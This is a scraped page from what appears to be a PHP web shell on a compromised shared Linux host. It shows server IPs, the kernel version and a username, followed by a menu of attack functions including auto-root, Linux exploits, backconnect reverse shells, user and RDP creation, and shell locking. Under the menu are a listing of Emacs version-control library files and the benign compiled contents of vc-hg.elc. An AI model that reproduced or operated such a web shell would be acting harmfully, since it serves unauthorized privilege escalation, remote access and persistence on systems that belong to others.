Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
27.1 /
lisp /
vc /
[ HOME SHELL ]
Name
Size
Permission
Action
add-log.elc
37.32
KB
-rw-r--r--
compare-w.elc
11.43
KB
-rw-r--r--
cvs-status.elc
20.93
KB
-rw-r--r--
diff-mode.elc
79.3
KB
-rw-r--r--
diff.elc
8.12
KB
-rw-r--r--
ediff-diff.elc
35.59
KB
-rw-r--r--
ediff-help.elc
11.75
KB
-rw-r--r--
ediff-hook.elc
6.46
KB
-rw-r--r--
ediff-init.elc
61.37
KB
-rw-r--r--
ediff-merg.elc
9.59
KB
-rw-r--r--
ediff-mult.elc
62.71
KB
-rw-r--r--
ediff-ptch.elc
20.25
KB
-rw-r--r--
ediff-util.elc
119.86
KB
-rw-r--r--
ediff-vers.elc
5.25
KB
-rw-r--r--
ediff-wind.elc
28.56
KB
-rw-r--r--
ediff.elc
41.19
KB
-rw-r--r--
emerge.elc
78.92
KB
-rw-r--r--
log-edit.elc
36.48
KB
-rw-r--r--
log-view.elc
18.74
KB
-rw-r--r--
pcvs-defs.elc
15.37
KB
-rw-r--r--
pcvs-info.elc
22.11
KB
-rw-r--r--
pcvs-parse.elc
14.9
KB
-rw-r--r--
pcvs-util.elc
21.53
KB
-rw-r--r--
pcvs.elc
85.67
KB
-rw-r--r--
smerge-mode.elc
39.76
KB
-rw-r--r--
vc-annotate.elc
26.25
KB
-rw-r--r--
vc-bzr.elc
41.48
KB
-rw-r--r--
vc-cvs.elc
36.24
KB
-rw-r--r--
vc-dav.elc
4.49
KB
-rw-r--r--
vc-dir.elc
43.58
KB
-rw-r--r--
vc-dispatcher.elc
17.4
KB
-rw-r--r--
vc-filewise.elc
1.91
KB
-rw-r--r--
vc-git.elc
74.65
KB
-rw-r--r--
vc-hg.elc
58.67
KB
-rw-r--r--
vc-hooks.elc
30.18
KB
-rw-r--r--
vc-mtn.elc
14.04
KB
-rw-r--r--
vc-rcs.elc
34.65
KB
-rw-r--r--
vc-sccs.elc
14.63
KB
-rw-r--r--
vc-src.elc
7.25
KB
-rw-r--r--
vc-svn.elc
23.45
KB
-rw-r--r--
vc.elc
75.95
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vc-hg.elc
;ELC ;;; Compiled ;;; in Emacs version 27.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. ;;; This file does not contain utf-8 non-ASCII characters, ;;; and so can be loaded in Emacs versions earlier than 23. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\302\303\304\305\306\307\310\311&\210\312\313\314\315\316DD\317\320\321\306\322\310\303& \210\312\323\314\315\324DD\325\320\326\306\327\310\303& \210\312\330\314\315\331DD\332\320\333\306\334\310\303& \210\312\335\314\315\336DD\337\320\340\306\341\310\303& \210\312\342\314\315\343DD\344\320\345\310\303&\210\312\346\314\315\347DD\350\320\351\310\303\306\352& \210\353\354\355\304#\207" [require cl-lib custom-declare-group vc-hg nil "VC Mercurial (hg) backend." :version "24.1" :group vc custom-declare-variable vc-hg-global-switches funcall function #[0 "\300\207" [nil] 1] "Global switches to pass to any Hg command." :type (choice (const :tag "None" nil) (string :tag "Argument String") (repeat :tag "Argument List" :value (#1="") string)) "22.2" vc-hg-diff-switches #[0 "\300\207" [t] 1] "String or list of strings specifying switches for Hg diff under VC.\nIf nil, use the value of `vc-diff-switches'. If t, use no switches." (choice (const :tag "Unspecified" nil) (const :tag "None" t) (string :tag "Argument String") (repeat :tag "Argument List" :value (#1#) string)) "23.1" vc-hg-annotate-switches #[0 "\300\207" [("-u" "--follow")] 1] "String or list of strings specifying switches for hg annotate under VC.\nIf nil, use the value of `vc-annotate-switches'. If t, use no\nswitches." (choice (const :tag "Unspecified" nil) (const :tag "None" t) (string :tag "Argument String") (repeat :tag "Argument List" :value (#1#) string)) "25.1" vc-hg-revert-switches #[0 "\300\207" [nil] 1] "String or list of strings specifying switches for hg revert\nunder VC." (choice (const :tag "None" nil) (string :tag "Argument String") (repeat :tag "Argument List" :value (#1#) string)) "27.1" vc-hg-program #[0 "\300\207" [#2="hg"] 1 #2#] "Name of the Mercurial executable (excluding any arguments)." string vc-hg-root-log-format #[0 "\300\301\302BB\207" ["{rev}:{ifeq(branch, 'default','', '{branch}')}:{bookmarks}:{tags}:{author|person} {date|shortdate} {desc|firstline}\\n" "^\\(?:[+@o x|-]*\\)\\([0-9]+\\):\\([^:]*\\):\\([^:]*\\):\\([^:]*\\):\\(.*?\\)[ ]+\\([0-9]\\{4\\}-[0-9]\\{2\\}-[0-9]\\{2\\}\\)" (((1 'log-view-message) (2 'change-log-file) (3 'change-log-list) (4 'change-log-conditionals) (5 'change-log-name) (6 'change-log-date)))] 3] "Mercurial log template for `vc-hg-print-log' short format.\nThis should be a list (TEMPLATE REGEXP KEYWORDS), where TEMPLATE\nis the \"--template\" argument string to pass to Mercurial,\nREGEXP is a regular expression matching the resulting Mercurial\noutput, and KEYWORDS is a list of `font-lock-keywords' for\nhighlighting the Log View buffer." (list string string (repeat sexp)) "24.5" put Hg vc-functions] 10) (defvar vc-hg-history nil) (defalias 'vc-hg-revision-granularity #[0 "\300\207" [repository] 1]) #@14 (fn FILES) (defalias 'vc-hg-checkout-model #[257 "\300\207" [implicit] 2 (#$ . 3190)]) (defalias 'vc-hg-update-on-retrieve-tag #[0 "\300\207" [nil] 1]) #@58 Return non-nil if FILE is registered with hg. (fn FILE) (defalias 'vc-hg-registered #[257 "\300!\205 \301!\211\205 \211\302>?\262\207" [vc-hg-root vc-hg-state (ignored unregistered)] 4 (#$ . 3350)]) #@47 Hg-specific version of `vc-state'. (fn FILE) (defalias 'vc-hg-state #[257 "\300!\211\301=\203 \302!\202 \211\207" [vc-hg-state-fast unsupported vc-hg-state-slow] 4 (#$ . 3561)]) #@52 Determine status of FILE by running hg. (fn FILE) (defalias 'vc-hg-state-slow #[257 "\304!\262\305\306!\307\310!\311\216 r q\210\3121: \313\314\315\316E\n\"\317\305\320\305\321\322\321\323\321\324\325\326\327!& )0\202<